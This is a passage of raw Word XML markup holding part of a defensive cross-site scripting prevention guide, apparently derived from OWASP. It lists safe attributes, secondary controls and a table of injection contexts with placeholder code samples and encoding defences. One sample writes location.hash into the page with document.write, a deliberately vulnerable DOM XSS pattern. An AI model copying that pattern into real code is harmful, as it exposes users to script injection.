        </w:rPr>
        <w:t>rev</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>rows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>rowspan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>scrolling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>shape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>span</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>tabindex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>usemap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>valign</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>vlink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>vspace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">For a comprehensive list, check out the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://github.com/cure53/DOMPurify/blob/main/src/attrs.js"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>DOMPurify allowlist</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="336" w:after="220" w:before="550"/>
        <w:outlineLvl w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="34"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Other Controls</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="39" w:name="_Toc6fw14iee51wt"/>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Framework Security Protections, Output Encoding, and HTML Sanitization will provide the best protection for your application. OWASP recommends these in all circumstances.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Consider adopting the following controls in addition to the above.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Cookie Attributes - These change how JavaScript and browsers can interact with cookies. Cookie attributes try to limit the impact of an XSS attack but don’t prevent the execution of malicious content or address the root cause of the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:spacing w:after="120"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Content Security Policy - An allowlist that prevents content being loaded. It’s easy to make mistakes with the implementation so it should not be your primary defense mechanism. Use a CSP as an additional layer of defense and have a look at the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>cheatsheet here</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:bidi w:val="false"/>
        <w:ind w:hanging="360" w:left="720"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Web Application Firewalls - These look for known attack strings and block them. WAF’s are unreliable and new bypass techniques are being discovered regularly. WAFs also don’t address the root cause of an XSS vulnerability. In addition, WAFs also miss a class of XSS vulnerabilities that operate exclusively client-side. WAFs are not recommended for preventing XSS, especially DOM-Based XSS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="220" w:before="440"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>XSS Prevention Rules Summary</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="40" w:name="_Tocsz4mg8i3ou0m"/>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>The following snippets of HTML demonstrate how to safely render untrusted data in a variety of different contexts.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="415111"/>
        <w:tblW w:w="10336" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1589"/>
        <w:gridCol w:w="1965"/>
        <w:gridCol w:w="2760"/>
        <w:gridCol w:w="4020"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="180"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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b w:val="true"/>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Data Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965"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b w:val="true"/>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Context</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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b w:val="true"/>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Code Sample</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="402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b w:val="true"/>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="180"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965"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HTML Body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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3"/>
              </w:rPr>
              <w:t>&lt;span&gt;UNTRUSTED DATA &lt;/span&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="402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HTML Entity Encoding (rule #1).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="720"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965"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Safe HTML Attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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3"/>
              </w:rPr>
              <w:t>&lt;input type="text" name="fname" value="UNTRUSTED DATA "&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="402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Aggressive HTML Entity Encoding (rule #2), Only place untrusted data into a list of safe attributes (listed below), Strictly validate unsafe attributes such as background, ID and name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965"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GET Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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3"/>
              </w:rPr>
              <w:t>&lt;a href="/site/search?value=UNTRUSTED DATA "&gt;clickme&lt;/a&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="402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URL Encoding (rule #5).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="720"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965"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Untrusted URL in a SRC or HREF attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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3"/>
              </w:rPr>
              <w:t>&lt;a href="UNTRUSTED URL "&gt;clickme&lt;/a&gt; &lt;iframe src="UNTRUSTED URL " /&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="402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Canonicalize input, URL Validation, Safe URL verification, Allow-list http and HTTPS URLs only (Avoid the JavaScript Protocol to Open a new Window), Attribute encoder.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965"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CSS Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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3"/>
              </w:rPr>
              <w:t>HTML &lt;div style="width: UNTRUSTED DATA ;"&gt;Selection&lt;/div&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="402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Strict structural validation (rule #4), CSS Hex encoding, Good design of CSS Features.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="576"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965"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JavaScript Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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3"/>
              </w:rPr>
              <w:t>&lt;script&gt;var currentValue='UNTRUSTED DATA ';&lt;/script&gt; &lt;script&gt;someFunction('UNTRUSTED DATA ');&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="402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Ensure JavaScript variables are quoted, JavaScript Hex Encoding, JavaScript Unicode Encoding, Avoid backslash encoding (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>\"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>\'</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>\\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965"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HTML Body</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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3"/>
              </w:rPr>
              <w:t>&lt;div&gt;UNTRUSTED HTML&lt;/div&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="402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HTML Validation (JSoup, AntiSamy, HTML Sanitizer...).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="158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String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1965"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DOM XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="276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3"/>
              </w:rPr>
              <w:t>&lt;script&gt;document.write("UNTRUSTED INPUT: " + document.location.hash );&lt;script/&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="402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color w:val="0000FF"/>
                <w:sz w:val="15"/>
                <w:u w:val="single" w:color="0000ff"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
              <w:instrText>HYPERLINK "https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html"</w:instrText>
              <w:fldChar w:fldCharType="separate"/>
              <w:t/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="15"/>
                <w:u w:val="single" w:color="0000ff"/>
              </w:rPr>
              <w:t>DOM based XSS Prevention Cheat Sheet</w:t>
            </w:r>
            <w:r>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:line="360" w:after="220" w:before="440"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Output Encoding Rules Summary</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="41" w:name="_Toc1zxff8oio8xg"/>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>The purpose of output encoding (as it relates to Cross Site Scripting) is to convert untrusted input into a safe form where the input is displayed as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the user without executing as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="true"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the browser. The following charts details a list of critical output encoding methods needed to stop Cross Site Scripting.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="679723"/>
        <w:tblW w:w="10320" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1710"/>
        <w:gridCol w:w="8609"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="180"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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b w:val="true"/>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Encoding Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860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b w:val="true"/>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Encoding Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="360"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="171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HTML Entity Encoding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="860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Convert</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="13"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
                <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>to</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
